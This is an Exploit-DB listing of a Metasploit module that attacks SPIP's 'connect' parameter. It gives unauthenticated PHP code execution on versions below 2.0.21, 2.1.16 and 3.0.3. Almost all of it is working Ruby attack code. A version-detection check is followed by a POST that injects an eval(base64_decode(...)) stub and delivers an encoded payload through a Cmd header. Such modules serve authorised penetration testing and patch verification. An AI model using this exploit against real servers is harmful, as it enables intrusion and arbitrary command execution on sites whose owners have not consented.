SPIP - 'connect' PHP Injection (Metasploit)

EDB-ID:

27941

CVE:





Platform:

PHP

Date:

2013-08-29


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SPIP connect Parameter PHP Injection',
      'Description'    => %q{
        This module exploits a PHP code injection in SPIP. The vulnerability exists in the
        connect parameter and allows an unauthenticated user to execute arbitrary commands
        with web user privileges. Branchs 2.0, 2.1 and 3 are concerned. Vulnerable versions
        are <2.0.21, <2.1.16 and < 3.0.3, but this module works only against branch 2.0 and
        has been tested successfully with SPIP 2.0.11 and SPIP 2.0.20 with Apache on Ubuntu
        and Fedora linux distributions.
      },
      'Author'         =>
        [
          'Arnaud Pachot',   #Initial discovery
          'Frederic Cikala', # PoC
          'Davy Douhine'     # PoC and MSF module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '83543' ],
          [ 'BID', '54292' ],
          [ 'URL', 'http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 04 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to SPIP application', '/']),
      ], self.class)
  end

  def check
    version = nil
    uri = normalize_uri(target_uri.path, "spip.php")

    res = send_request_cgi({ 'uri' => "#{uri}" })

    if res and res.code == 200 and res.body =~ /<meta name="generator" content="SPIP (.*) \[/
      version = $1
    end

    if version.nil? and res.code == 200 and res.headers["Composed-By"] =~ /SPIP (.*) @/
      version = $1
    end

    if version.nil?
      return Exploit::CheckCode::Unknown
    end

    vprint_status("SPIP Version detected: #{version}")

    if version =~ /^2\.0/ and version < "2.0.21"
      return Exploit::CheckCode::Vulnerable
    elsif version =~ /^2\.1/ and version < "2.1.16"
      return Exploit::CheckCode::Appears
    elsif version =~ /^3\.0/ and version < "3.0.3"
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe

  end

  def exploit
    uri = normalize_uri(target_uri.path, 'spip.php')
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    res = send_request_cgi(
      {
        'uri'    => uri,
        'method' => 'POST',
        'vars_post' => {
          'connect' => "?><? eval(base64_decode($_SERVER[HTTP_CMD])); ?>",
        },
        'headers' => {
          'Cmd' => Rex::Text.encode_base64(payload.encoded)
        }
      })
  end

end